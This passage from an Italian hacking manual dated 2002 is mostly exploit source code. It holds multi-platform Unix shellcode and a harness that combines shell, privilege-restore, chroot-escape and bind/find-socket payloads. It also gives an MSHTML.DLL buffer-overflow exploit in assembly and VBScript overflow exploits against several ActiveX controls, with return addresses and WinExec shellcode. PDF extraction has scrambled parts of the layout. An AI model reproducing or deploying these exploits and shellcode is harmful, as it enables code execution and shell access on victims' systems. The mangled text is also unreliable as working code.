/*
/*
/*
/*
/*
/*

44+cmdlen bytes
jmp
<cmdshellcode+39>
popl
%ecx
xorl
%eax,%eax
pushl
%eax
pushl
$0x68732f2f
pushl
$0x6e69622f
movl
%esp,%ebx
pushl
%eax
pushw
$0x632d
movl
%esp,%edi
pushl
%ecx
pushl
%edi
pushl
%ebx
movl
%esp,%ebx
pushl
%eax
pushl
%ebx
pushb
$0x03
pushl
%eax
movb
$0xa2,%al
int
$0x25
call
<cmdshellcode+2>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char jump[]=
"\x8b\xc4"
"\xc3"
;

/* movl
/* ret

%esp,%eax

*/
*/

#endif

Programma desempio legati alluso dei codici


K.1 asmcodes.h
#ifndef ASMCODES_H
#define ASMCODES_H
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

"mips-irix"
"sparc-solaris"
"parisc-hpux"
"powerpc-aix"
"alpha-ultrix"
"x86-beos"
"x86-bsd"
"x86-linux"
"x86-solaris"
"x86-sco"

typedef struct{char *n;char *c;}asmcodes_t[9];


asmcodes_t asmcodes={
#if defined(AIX) || ( defined(X86) && ( defined(SOLARIS) || defined(SCO) ) )
{ "syscallcode",
syscallcode },
#else
{ "",
NULL
},
#endif

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


{ "shellcode",
shellcode
},
{ "cmdshellcode", cmdshellcode },
#if !defined(BEOS) && !defined(ULTRIX)
#if defined(SOLARIS) || defined(SCO) || defined(LINUX) || defined(BSD)
{ "setuidcode",
setuidcode
},
#endif
#if defined(HPUX)
{ "setresuidcode", setresuidcode },
#endif
#if defined(IRIX) || defined(AIX)
{ "setreuidcode", setreuidcode },
#endif
{ "chrootcode",
chrootcode
},
#if !defined(OPENSERVER)
{ "findsckcode",
findsckcode
},
#else
{ "",
NULL
},
#endif
#if !defined(SCO)
{ "bindsckcode",
bindsckcode
}
#else
{ "",
NULL
},
#endif
#else
{ "",
NULL
},
{ "",
NULL
},
{ "",
NULL
},
{ "",
NULL
}
#endif
};
#if defined(BEOS) || defined(ULTRIX)
#define FINDSCKPORTOFS
-1
#define BINDSCKPORTOFS
-1
#define usleep(a) sleep(1)
#endif
#define is(flag)
(flags&(1<<flag))
#define block(flag) (flags&(1<<flag))
#define code(flag) asmcodes[flag].c
#define
#define
#define
#define
#define
#define
#define

SYSCALL
SHELL
CMD
CRED
CHROOT
FIND
BIND

0
1
2
3
4
5
6

#define _REMOTE 9
typedef struct{char state;char *follow;int flag;}pblock_t[4];
pblock_t tab={
{ 'P', "CSRFB",
{ 'R', "CSFB" ,
{ 'F', "CS"
,
{ 'B', "CS"
,
};

(1<<CRED)
(1<<CHROOT)
(1<<FIND)|(1<<_REMOTE)
(1<<BIND)|(1<<_REMOTE)

},
},
},
}

int parseblocks(char *b){


char c,s;int i,flag=0;s=(strlen(b)==1);
while((c=*b++)&&*b){
for(i=0;i<4;i++) if(c==tab[i].state) break;
if(i==4) return(-1);
if(strchr(tab[i].follow,*b)) flag|=tab[i].flag; else return(-1);
}
if(c=='S') flag|=(1<<SHELL);
else if(c=='C') flag|=(1<<CMD); else return(-1);
return(flag);
}
#endif

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


K.2 asmcodes.c
/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland
/*## unix asmcodes testing facility
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

*://lsd-pl.net/ #*/
#*/

this code provides the capability of testing different assembly code


blocks in proof of concept codes
compilation:
(g)cc asmcodes.c -DSYSTEM -DPROCESSOR [-DVERSION] [-lnsl -lsocket]
platforms:
files:
-DIRIX
-DMIPS
; mips-irix
-DSOLARIS
-DSPARC
; sparc-solaris
-DHPUX
-DPARISC
; parisc-hpux
-DAIX
-DPOWERPC -DV41|-DV42|-DV43
; powerpc-aix
-DULTRIX
-DALPHA
; alpha-ultrix
-DSOLARIS
-DX86
; x86-solaris
-DBEOS
-DX86
; x86-beos
-DLINUX
-DX86
; x86-linux
-DOPENBSD
-DX86
; x86-bsd
-DFREEBSD
-DX86
; x86-bsd
-DNETBSD
-DX86
; x86-bsd
-DOPENSERVER -DX86
; x86-sco
-DUNIXWARE
-DX86
; x86-sco

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

#include <sys/types.h>
#include <sys/socket.h>
#if defined(AIX)
#include <sys/select.h>
#endif
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include "_asmcodes.h"
int main(int argc,char **argv){
char buffer[1024],*b,*cmd="id";
int i,c,n,flags=-1,port=1234,sck;
struct hostent *hp;
struct sockaddr_in adr;
printf("copyright LAST STAGE OF DELIRIUM feb 2001 poland
printf("unix asmcodes testing facility\n\n");

//lsd-pl.net/\n");

while((c=getopt(argc,argv,"b:c:p:"))!=-1){
switch(c){
case 'b': flags=parseblocks(optarg);break;
case 'c': cmd=optarg;break;
case 'p': port=atoi(optarg);break;
}
}
if(flags==-1){
printf("usage: %s -b buffer [-p port] [-c \"cmd\"]\n%s",argv[0],
" where the buffer is composed of one of the following blocks:\n"
" S interactive shell\n"
" C single command (-c \"cmd\", or predefined \"id\")\n"
" P restore privileges\n"
" R escape chroot jail\n"
" F find socket (-p port, or default=1234)\n"
" B bind socket (same as for F)\n\n"
" valid blocks combinations:\n"
" S PS RS PRS FS BS PFS PBS RFS RBS PRFS PRBS\n"
" C PC RC PRC FC BC PFC PBC RFC RBC PRFC PRBC\n\n"
" blocks implemented on this platform:\n "
);
for(i=1;i<9;i++) printf("%s ",asmcodes[i].n?asmcodes[i].n:"");
printf("\n\n example: %s -b PRFS -p 1112\n",argv[0]);
exit(-1);
}
/*

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


* if the find or bind codes are to be tested run simple network daemon
* simulating a vulnerable application. the simulation is done by the means
* of reading instructions stream from the network and then executing it.
*/
if(is(_REMOTE)){
if(!fork()){
sck=socket(AF_INET,SOCK_STREAM,0);
adr.sin_family=AF_INET;
adr.sin_port=htons(port);
adr.sin_addr.s_addr=htonl(INADDR_ANY);
i=1;
setsockopt(sck,SOL_SOCKET,SO_REUSEADDR,(void*)&i,sizeof(i));
if(bind(sck,(struct sockaddr*)&adr,sizeof(struct sockaddr_in))<0){
perror("error");exit(-1);
}
listen(sck,1);
if((i=accept(sck,(struct sockaddr*)0,(int*)0))==-1) exit(-1);
close(sck);sck=i;
read(sck,buffer,sizeof(buffer));
usleep(500000);
if(block(BIND)) close(sck);
#if defined(AIX)
{
int jump[2]={(int)buffer,*((int*)&main+1)};
sleep(1);
((*(void (*)())jump)());
}
#else
usleep(100000);
((*(void (*)())buffer)());
#endif
exit(-1);
}
sleep(1);
}
/*
* if this is remote code test, connect to the remote server, which
* simulates vulnerable aplication.
*/
if(is(_REMOTE)){
sck=socket(AF_INET,SOCK_STREAM,0);
adr.sin_family=AF_INET;
adr.sin_port=htons(port);
if((adr.sin_addr.s_addr=inet_addr("127.0.0.1"))==-1){
if((hp=gethostbyname("127.0.0.1"))==NULL){
errno=EADDRNOTAVAIL;perror("error");exit(-1);
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
if(connect(sck,(struct sockaddr*)&adr,sizeof(struct sockaddr_in))<0){
perror("error");exit(-1);
}
}
/*
* separate code pieces are combined into one block in the target buffer.
* for the findsckcode the local port of the connection established with
* a "vulnerable" server must be obtained. for bindsckcode the number
* of port to which the listening socket is to be bound must be specified.
*/
b=buffer;
if(code(SYSCALL)!=NULL){
for(i=0;i<strlen(code(SYSCALL));i++) *b++=code(SYSCALL)[i];
}
if(block(CRED)){
for(i=0;i<strlen(code(CRED));i++) *b++=code(CRED)[i];
}
if(block(CHROOT)){
for(i=0;i<strlen(code(CHROOT));i++) *b++=code(CHROOT)[i];
}
if(block(FIND)){
i=sizeof(struct sockaddr_in);
if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
struct{unsigned int maxlen;unsigned int len;char *buf;}nb;
ioctl(sck,(('S'<<8)|2),"sockmod");

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck,(('T'<<8)|144),&nb);
}
n=ntohs(adr.sin_port);
code(FIND)[FINDSCKPORTOFS+0]=(unsigned char)((n>>8)&0xff);
code(FIND)[FINDSCKPORTOFS+1]=(unsigned char)(n&0xff);
for(i=0;i<strlen(code(FIND));i++) *b++=code(FIND)[i];

}
if(block(BIND)){
n=port;
code(BIND)[BINDSCKPORTOFS+0]=(unsigned char)((n>>8)&0xff);
code(BIND)[BINDSCKPORTOFS+1]=(unsigned char)(n&0xff);
for(i=0;i<strlen(code(BIND));i++) *b++=code(BIND)[i];
}
if(block(SHELL)){
for(i=0;i<strlen(code(SHELL));i++) *b++=code(SHELL)[i];
}
if(block(CMD)){
for(i=0;i<strlen(code(CMD));i++) *b++=code(CMD)[i];
for(i=0;i<strlen(cmd);i++) *b++=cmd[i];
}
*b=0;

/*
* the portion of code simulating a "vulnerability" in a program, which
* is to be exploited locally
*/
if(!is(_REMOTE)){
#if defined(AIX)
{
int jump[2]={(int)&buffer,*((int*)&main+1)};
sleep(1);
((*(void (*)())jump)());
}
#else
#if defined(ULTRIX)
((*(void (*)())(unsigned long long)strdup(buffer))());
#else
usleep(100000);
((*(void (*)())buffer)());
#endif
#endif
exit(-1);
}
/*
* for remote test, send buffer via network socket to a simple daemon.
* do bind reconnection whereas needed. if remote shell gets executed,
* read commands from user, feed them to the shell and show their results.
*/
write(sck,buffer,strlen(buffer)+1);
if(block(BIND)){
close(sck);
sleep(2);
sck=socket(AF_INET,SOCK_STREAM,0);
adr.sin_port=htons(n);
if(connect(sck,(struct sockaddr*)&adr,sizeof(struct sockaddr_in))<0){
perror("error");exit(-1);
}
}
if(block(FIND)){
sleep(1);
}
write(sck,"uname -a\n",9);
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck,buf,cnt);

}
if(FD_ISSET(sck,&fds)){
if((cnt=read(sck,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}

}
}

exit(0);

Buffer Overflow in MSHTML.DLL


Indovinate dove si rova un buffer overflow ?
Dentro alla DLL che gestisce linterprete Micrsoft di HTML ovvero la DLL MSHTML.DLL.
In altre parole se viene fornito allinterprete uno statement del tipo :
<embed src="filename.AAAAAAAAAA<un certo numero di 'A'>">
lindirizzo di ritorno viene sovrascritto dalla translazione in UNICODE di AAAA ovvero
0x41004100.
Il buffer overflow avviene quando linterprete cerca di concatenare lestensione del file con
"Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappingOverride\"

tramite la funzione C wcscat().


Esiste un altro problema nel sistema di validazione e precisamente in quello che controlla se
esiste un estensione.
Esistono comqunue tre problemi specifici nella scritura dellexploit e precisaente :
1 Tutti i dati vengono convertiti in UNICODE e cio le A vengono convertite in 0x0041.
2. Lindirizzo della shell code potrebbe essere differente in base al numero di finestre aperte
3 Ci sono differenti offset di EIP salvati allinterno dello stack quando la versione di Internet
Explorer precedente e posteriore alla IE5.5SP2.
Il primo problema ci insegna a bypassarlo CodeRed ovvero sufficiente passare gi lo shell
code in UNICODE per evitare la routine di conversione.
Il secondo problema bypassabile facendo si che lindirizzo che andiamo a sovrascrivere di
fatto di una routine presente in una DLL in memoria a cui sar possibile saltare indietro
mediante EBP o ESP.
Abbiamo trovato un istruzione "jmp esp" (FFE4) in tutte le versioni di kernel32.dll e anche
dentro ad una versione di msvcrt.dll (6.10.8924.0).
Questa versione di DLL non dipende da Internet Explorer ed presente in qualsiasi
installazione Windows.
Il terzo problema possibile bypassarlo mediante la sovrascrittura dei vari EIPs salvati nello
stack, usando un certo numero di noops e

call xxxx
...
xxxx:
pop ebp

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


Se vi ricordate quando abbiamo parlato dei buffer overflow uno dei problemi era quello dato
dalla presenza di 0.
Qui non dobbiamo preoccuparci in quanto il tutto gi fornito come UNICODE.
Qui a seguito riportato una shel code con degli effetti visuali.

;
;
;
;
;
;
;
;
;
;
;
;
;
;
;
;
;
;
;
;
;
;
;
;

matrix.asm - source code for matrix.htm


build:
tasm matrix.asm /m2
tlink matrix.obj, matrix.htm /t /3
Authors:
ERROR: bug discovery
3APA3A: idea and coding
OFFliner: matrix effects and undocumented Windows API
Thanx to Andrey Kolishak for indirect esp jump idea
you can obtain matrix screensaver from
http://www.security.nnov.ru/matrix
eipjmp: overwrites saved EIP for all versions of
mshtml.dll
espjmp: gets control after jmp esp and calls code1
code1: restores EIP from stack after call to ebp
does some actions and jumps to code2
code2: does the rest of actions

datap equ (DataTable+080h)


hKernel32 equ LoadL-datap
cCur equ StringTable-datap
SetCCH equ StringTable+4-datap
GetSH equ StringTable+8-datap
Sleep equ StringTable+12-datap
WriteC equ StringTable+16-datap
AllocC equ StringTable+20-datap
SetCDM equ StringTable+24-datap
SetCTA equ StringTable+28-datap
SetCCI equ StringTable+32-datap
WinE equ StringTable+36-datap
ExitP equ StringTable+40-datap
hStdOut equ StringTable+48-datap
dwOldMode equ cCur
conCur equ StringTable+52-datap
cls equ StringTable+56-datap
DWNumChar equ StringTable+60-datap
RegHK equ user-datap
386
_faked segment para public 'CODE' use32
assume cs:_faked
start:
_faked ends
_main segment para public 'DATA' use32
assume cs:_main

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


prefix:

begin db 0ffh,0feh ;Unicode prefix


db "<",0,"e",0,"m",0,"b",0,"e",0,"d",0,0dh,0
db "s",0,"r",0,"c",0,"=",0,34,0
db "h",0,"t",0,"t",0,"p",0,":",0,"/",0,"/",0
db "w",0,"w",0,"w",0,".",0
db
"s",0,"e",0,"c",0,"u",0,"r",0,"i",0,"t",0,"y",0,".",0
db "n",0,"n",0,"o",0,"v",0,".",0,"r",0,"u",0
db "/",0,"f",0,"i",0,"l",0,"e",0,"s",0,"/",0
db "i",0,"e",0,"b",0,"o",0,"/",0,"X",0
db "!(c)3APA3A"
db 22 dup(090h)
code1:
pop ebp
mov esp,ebx
xor eax,eax
dataoffset = DataTable - code2
ebpdiff = 80h + dataoffset
mov ax,ebpdiff
add ebp,eax ;ebp points to data
lea eax,[ebp+user-datap]
push eax
mov ebx,[ebp+LoadL-datap]
mov eax,[ebx]
mov [ebp+LoadL-datap],eax
call eax ;LoadLibraryA("user32.dll")
lea ebx,[ebp+reg-datap]
push ebx
push eax
mov ebx,[ebp+GetPA-datap]
mov eax,[ebx]
mov [ebp+GetPA-datap],eax
call eax ;GetProcAddress(.,"RegisterHotKey")
mov [ebp+RegHK],eax
lea edi,[ebp+rhk-datap]
movzx esi,byte ptr[edi]
LoopHotkey:
inc edi
xor eax,eax
mov al,[edi]
push eax
inc edi
mov al,[edi]
push eax
inc edi
mov al,[edi]
push eax
xor eax,eax
push eax
call [ebp+RegHK]
dec esi
or esi,esi
jnz LoopHotKey
lea eax,[ebp+StringTable-datap] ;string "kernel32.dll"
push eax
call [ebp+LoadL-datap] ;LoadLibraryA("kernel32.dll")
mov [ebp+hKernel32],eax ;hKernel32 =

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


lea eax, [ebp+SetCCH]
mov [ebp+cCur],eax ;*cCur = SetCCH
lea edi,[ebp+funcnum-datap]
movzx esi,byte ptr[edi] ;esi=funcnum
inc edi
LoopResolve:
push edi
push dword ptr [ebp+Hkernel32]
call [ebp+GetPA-datap] ;GetProcAddress(edi)
mov ebx,[ebp+cCur]
mov [ebx],eax ;save func address
xor ecx,ecx
mov cl,4
add ebx,ecx
mov [ebp+cCur],ebx ;cCur+=4
not ecx
xor eax,eax
repnz scasb ;find \0
dec esi
or esi,esi
jnz LoopResolve

call [ebp+AllocC] ;AllocConsole()


push eax ;nonzero if succeed
xor eax,eax
push eax
call [ebp+SetCCH] ;SetConsoleCtrlHandler(NULL,TRUE)
xor eax,eax
not eax
sub al,0Ah
push eax
call [ebp+GetSH] ;GetStdHandle(STD_OUTPUT_HANDLE)
mov [ebp+hStdOut],eax ;hStdOut=
lea eax,[ebp+dwOldMode]
push eax
xor ebx,ebx
inc ebx
push ebx
push dword ptr [ebp+hStdOut]
call [ebp+SetCDM] ;SetConsoleDisplayMode(hStdOut, 1,
&dwOldMode)
xor ebx,ebx
mov bl,0Ah
push ebx
push dword ptr [ebp+hStdOut]
call [ebp+SetCTA]
;SetConsoleTextAttribute(hStdOut,FOREGROUND_INTENSITY|
FOREGROUND_GREEN)
xor ebx,ebx
mov [ebp+ConCur+4],ebx ;ConCur.bVisible = 100
mov bl, 100
mov [ebp+ConCur],ebx ;ConCur.dwSize = 0
lea eax, [ebp+ConCur]
push eax
push dword ptr [ebp+hStdOut]
call [ebp+SetCCI] ;SetConsoleCursorInfo(hstdOut,&ConCur)
xor eax,eax
mov ax,1000
push eax
call[ebp+Sleep] ;Sleep(1000);

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


xor ebx,ebx
mov bl, string-datap
mov eax,ebp
add eax,ebx
mov [ebp+cCur],eax ;cCur = string
mov eax,ebp
mov bx,datap-empty_string
sub eax,ebx
mov [ebp+cls],eax ;set address of empty_string
LOOP1: ;do do
xor eax,eax
push eax
lea ebx,[ebp+DWNumChar]
push ebx
inc eax
push eax
mov eax,[ebp+cCur]
push eax
push dword ptr [ebp+hStdOut]
call [ebp+WriteC]
;WriteConsole(hStdOut,(void*)cCur,1,&DWNumChar,NULL);
xor eax,eax
mov al,100
mov ecx,[ebp+cCur]
mov bl,[ecx]
sub bl,20
jnz N1
mov ax,400
N1: mov bl,[ecx]
sub bl,8
jnz N2
mov ax,2100
N2: push eax
call [ebp+Sleep] ;Sleep((*cCur==' ')?400:(*cCur=='\b')?
2100:100)
mov ecx,[ebp+cCur]
inc ecx
mov [ebp+cCur],ecx ;++cCur
mov bl,[ecx]
sub bl,9
jnz LOOP1 ;while(*cCur!='\t');
call [ebp+cls]
mov ecx,[ebp+cCur]
inc ecx
mov [ebp+cCur],ecx ;++cCur
mov bl,[ecx]
sub bl,00Ah
jnz LOOP1 ;while(*cCur!='\n');
inc ecx
xor eax,eax
push eax
lea ebx,[ebp+DWNumChar]
push ebx
mov al,18
push eax
push ecx
push dword ptr [ebp+hStdOut]
jmp code2

codelength = $ - begin

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


neednoops = 1d4h - codelength
db neednoops dup(090h)
eipjmp:
dd
dd
dd
dd
dw
dd

78024e02h
78024e02h
78024e02h
78024e02h
9090h
78024e02h ;EIP for IE < 55SP2

espjmp:
db 18 dup(090h)
xor eax,eax ;ESP comes here
mov ax,0170h
mov ebx,esp
sub ebx,eax
call ebx
code2:

call [ebp+WriteC]
xor eax,eax
mov ax,4000
push eax
call [ebp+Sleep]
call [ebp+cls]
lea eax,[ebp+cmdexe-datap]
push eax
push eax
call [ebp+WinE]
xor eax,eax
push eax
call [ebp+ExitP]

empty_string:
; some code can be pasted here
xor eax,eax
mov ax,1000
push eax
call [ebp+Sleep] ;Sleep(1000)
xor eax,eax
push eax
lea ebx,[ebp+DWNumChar]
push ebx
mov al,30
push eax
lea eax,[ebp+empty-datap]
push eax
push dword ptr [ebp+hStdOut]
call [ebp+WriteC]
ret

DataTable:
LoadL dd 780330d0h ;LoadLibraryA import table entry
GetPA dd 780330cch ;GetProcAddress import table entry

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


StringTable:
db "kernel32.dll",0
funcnum db 10
db "SetConsoleCtrlHandler",0
db "GetStdHandle",0
db "Sleep",0
db "WriteConsoleA",0
db "AllocConsole",0
db "SetConsoleDisplayMode",0
db "SetConsoleTextAttribute",0
db "SetConsoleCursorInfo",0
db "WinExec",0
db "ExitProcess",0
user db "user32.dll",0
reg db "RegisterHotKey",0
cmdexe db "cmd.exe",0
rhk db 5
db 9,1,100,01bh,1,101,13,1,102,05dh,8,103,3,2,104
empty db 00dh,28 dup(020h),00dh,0
string db 00dh," Wake Up, Neo...",00dh,009h,0
db 00dh," The Matrix has you...",00dh,009h,0
db 00dh," Follow the White
Rabbit.",00dh,008h,009h,00ah,0
db 00dh," Knock, knock...",00dh,0
padding db 32
suffix:

db 34,0,">",0,00ah
copy db "(c) 2002 by 3APA3A, ERRor, OFFLiner"

_main ends
end start

Buffers Overflow a vari componenti di Windows


Esistono diversi OCX in ambiente WINDOWS che possiedono dei bugs che li rendono
suscettibili di buffer overflow.
Acrobat Control for ActiveX - PDF.OCX (v1.3.188)
Setupctl 1.0 Type Library - SETUPCTL.DLL (v1, 1, 0, 6)
EYEDOG OLE Control module - EYEDOG.OCX (v1.1.1.75)
MSN ActiveX Setup BBS Control - SETUPBBS.OCX (v4.71.0.10)
hhopen OLE Control Module - HHOPEN.OCX (v1, 0, 0, 1)
RegWizCtrl 1.0 Type Library - REGWIZC.DLL (v3, 0, 0, 0)
I vari exploits sono relativi a codici HTML, quindi fate vuoi a fantasia.
Negli esempi qello che si esegue il solito calcolatore.
PDF
<object classid="clsid:CA8A9780-280D-11CF-A24D-444553540000"
id="pdf"></object>
<script language="VBscript"><!-msgbox("Adobe Acrobat OCX Buffer Overrun" + Chr(10) + "Written by Shane
Hird")

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


expstr =
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA"
expstr = expstr + Chr(235) 'Address in SHELL32, Win98 (7FD035EB) of JMP ESP
expstr = expstr + Chr(53) 'You may need to use a different address
expstr = expstr + Chr(208)
expstr = expstr + Chr(127)
'Stack is slightly trashed, but NOPs fix it up ok
expstr = expstr + Chr(144) + Chr(144) + Chr(144) + Chr(144) + Chr(144)
'MOV EDI, ESP
expstr = expstr + Chr(139) + Chr(252)
'ADD EDI, 19 (Size of code)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
'PUSH EAX (Window Style EAX = 1)
expstr = expstr + Chr(80)
'PUSH EDI (Address of command line)
expstr = expstr + Chr(87)
'MOV EDX, BFFA0960 (WinExec, Win98)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
'CALL EDX
expstr = expstr + Chr(255) + Chr(210)
'XOR EAX, EAX
expstr = expstr + Chr(51) + Chr(192)
'PUSH EAX
expstr = expstr + Chr(80)
'MOV EDX, BFF8D4CA (ExitProcess, Win98)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191)
'CALL EDX
expstr = expstr + Chr(255) + Chr(210)
'Replace with any command + 0 (automatically appended)
expstr = expstr + "CALC.EXE"
'Call exploitable method
pdf.setview(expstr)
--></script>

SETUPCTL
<object classid="clsid:F72A7B0E-0DD8-11D1-BD6E-00AA00B92AF1" id =

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


"setupctl">
</object>
<script language="vbscript"><!-msgbox("Setupctl 1.0 Type Library Buffer Overrun" + Chr(10) + "Written by
Shane Hird")
expstr="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAA"
expstr = expstr + Chr(235) 'Address in SHELL32, Win98 (7FD035EB) of JMP ESP
expstr = expstr + Chr(53) 'You may need to use a different address
expstr = expstr + Chr(208)
expstr = expstr + Chr(127)
'NOP for debugging purposes
expstr = expstr + Chr(144)
'MOV EDI, ESP
expstr = expstr + Chr(139) + Chr(252)
'ADD EDI, 19h (Size of code)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
'PUSH EAX (Window Style EAX = 41414141)
expstr = expstr + Chr(80)
'PUSH EDI (Address of command line)
expstr = expstr + Chr(87)
'MOV EDX, BFFA0960 (WinExec, Win98)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
'CALL EDX
expstr = expstr + Chr(255) + Chr(210)
'XOR EAX, EAX
expstr = expstr + Chr(51) + Chr(192)
'PUSH EAX
expstr = expstr + Chr(80)
'MOV EDX, BFF8D4CA (ExitProcess, Win98)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191)
'CALL EDX
expstr = expstr + Chr(255) + Chr(210)
'Replace with any command + 0 (automatically appended)
expstr = expstr + "CALC.EXE"
'Run exploit
setupctl.DistUnit = expstr
setupctl.InstallNow

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book


--></script>

REGWIZC
<object classid="clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00" id="RegWizObj">
</object>
<script language="VbScript" ><!-msgbox("Registration Wizard Buffer Overrun" + Chr(10) + "Written by Shane
Hird")
expstr = "/i
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA"
'We overflowed to the RET point of the stack
'No NULL's allowed so ret to <JMP ESP> in Shell32
expstr = expstr & Chr(235) 'Address in SHELL32, Win98 (7FD035EB) of JMP ESP
expstr = expstr & Chr(53) 'You may need to use a different address
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)
'NOP for debugging purposes
expstr = expstr + Chr(144)
'MOV EDI, ESP
expstr = expstr + Chr(139) + Chr(252)
'ADD EDI, 19 (Size of code)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
'PUSH EAX (Window Style EAX = 41414141)
expstr = expstr + Chr(80)
'PUSH EDI (Address of command line)
expstr = expstr + Chr(87)
'MOV EDX, BFFA0960 (WinExec, Win98)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
'CALL EDX
expstr = expstr + Chr(255) + Chr(210)
'XOR EAX, EAX
expstr = expstr + Chr(51) + Chr(192)
'PUSH EAX
expstr = expstr + Chr(80)

(C) Copyright 2002 Flavio Bernadotti HackersBook@crackinguniversity2000.it

Hackers Programming Book

'MOV EDX, BFF8D4CA (ExitProcess, Win98)


expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191)
'CALL EDX
expstr = expstr + Chr(255) + Chr(210)
'Replace with any command + 0 (automatically appended)
expstr = expstr + "CALC.EXE"
RegWizObj.InvokeRegWizard(expstr)
--></script>

EYEDOG
The following code will terminate the browser:
<object classid="clsid:06A7EC63-4E21-11D0-A112-00A0C90543AA"
id="eye"></object>
<script language="vbscript"><!-msgbox("EYEDOG OLE Control module Buffer Overrun (Local Version)" + Chr(10)
+ "Written by Shane Hird")
'Padding for the exploit
expstr =
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
'RET address (ExitProcess, BFF8D4CA)
expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191)
'Call exploitable method (MSInfoLoadFile)
eye.MSInfoLoadFile(expstr)
--></script>

HHOPEN
This will, again, terminate the browser:
<object
classid="clsid:130D7743-5F5A-11D1-B676-00A0C9697233"
id="hhopen"></OBJECT>
<script language="vbscript"><!-msgbox("hhopen OLE Control Module Buffer Overrun" + Chr(10) + "Written By
